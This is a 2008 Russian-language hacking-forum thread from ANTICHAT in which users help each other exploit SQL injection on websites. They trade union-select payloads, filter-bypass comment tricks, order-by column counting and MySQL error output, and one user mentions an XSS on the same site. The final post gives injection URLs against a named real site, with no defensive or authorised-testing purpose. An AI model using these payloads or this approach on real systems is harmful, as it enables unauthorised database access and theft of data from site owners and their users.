HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.09.2008, 13:38
SIdoy
Новичок
Регистрация: 19.09.2007
Сообщений: 12
С нами: 9812750

Репутация: 19
По умолчанию

Цитата:
Сообщение от IND1G0  
http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?

Попробуй вместо пробелов /**/

id=0/**/union/**/select/**/1/*
 
Ответить с цитированием

  #2  
Старый 25.09.2008, 00:22
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами: 9655526

Репутация: 1334
По умолчанию

А почему у тебя id=0?? попробуй -1 или 99999.
 
Ответить с цитированием

  #3  
Старый 25.09.2008, 00:23
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
С нами: 9283286

Репутация: 1
По умолчанию

если даже так разницы нет)

А да и еще на сайте есть XSS
http://сайт/id=[XSS]/*

Последний раз редактировалось IND1G0; 25.09.2008 в 00:30..
 
Ответить с цитированием

  #4  
Старый 25.09.2008, 00:28
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Ссылку хоть дай
 
Ответить с цитированием

  #5  
Старый 25.09.2008, 00:28
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами: 9655526

Репутация: 1334
По умолчанию

А оставить ковычку пробывал?
 
Ответить с цитированием

  #6  
Старый 25.09.2008, 00:36
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
С нами: 9283286

Репутация: 1
По умолчанию

Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
 
Ответить с цитированием

  #7  
Старый 25.09.2008, 01:26
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами: 9367310

Репутация: 52
По умолчанию

Цитата:
Сообщение от IND1G0  
Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Попробуй использовать такой комент "--" вместо "/*"
 
Ответить с цитированием

  #8  
Старый 25.09.2008, 01:34
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
С нами: 9283286

Репутация: 1
Unhappy

Цитата:
Сообщение от MirA  
Попробуй использовать такой комент "--" вместо "/*"
тоже уже пробовал
 
Ответить с цитированием

  #9  
Старый 25.09.2008, 04:02
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

а ещё вот такой +--+

и проверь на раскрытые скобки в запросе. Попробуй проанализировать, что там фильтруется
 
Ответить с цитированием

  #10  
Старый 25.09.2008, 13:05
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию

Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/* 
но так нехочет:
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...